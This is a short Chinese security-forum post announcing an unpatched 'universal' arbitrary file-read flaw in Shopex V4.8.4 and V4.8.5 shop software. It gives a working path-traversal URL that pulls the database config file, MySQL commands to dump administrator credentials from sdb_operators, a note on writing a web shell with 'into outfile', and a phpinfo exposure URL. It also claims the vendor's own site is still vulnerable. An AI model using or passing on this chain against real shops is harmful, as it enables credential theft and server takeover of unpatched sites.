热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Shopex V4.8.4 V4.8.5 0Day 通杀

发布时间:2010-04-22 08:37文章来源:未知文章作者:黑白前线 点击次数:
摘要:发布日期:2010-04-22 发布作者:dbgger 影响版本:Shopex V4.8.4 V4.8.5 漏洞描述:文件过滤不严,导致任意文件读取漏洞。 测试代码: http://www.target.com/shopadmin/index.php?ctl=sfileact=getDBp[0]=../../config/config.php 可以连上数据库. mysql -...
  1. 发布日期:2010-04-22  
  2. 发布作者:dbgger    
  3. 影响版本: Shopex V4.8.4 V4.8.5 
  4. 漏洞描述: 文件过滤不严,导致任意文件读取漏洞。
  5. 测试代码:

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

可以连上数据库.

mysql -h1.1..1.1 -uuser -ppass

use yourbasename;

select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell,没有仔细研究.

我测试的站,直接用into outfile 一个shell.

网上有个帖子,说可以爆物理路径.测试不可用.

如果install目录没删.下面这个可以看phpinfo

http://www.target.com/install/svinfo.php?phpinfo=true
 

另外/home/cache/目录的文件,也是可以爆出来的.

目前shopex 官方站,仍然存在该漏洞. 测试截图如下
 

shop1
 

 

标签分类: 安全漏洞 0day 脚本漏洞 文件读取漏洞 shopex 0day

上一篇: CMS Ariadna 2009 SQL Injection
下一篇:唠叨微博网 0day漏洞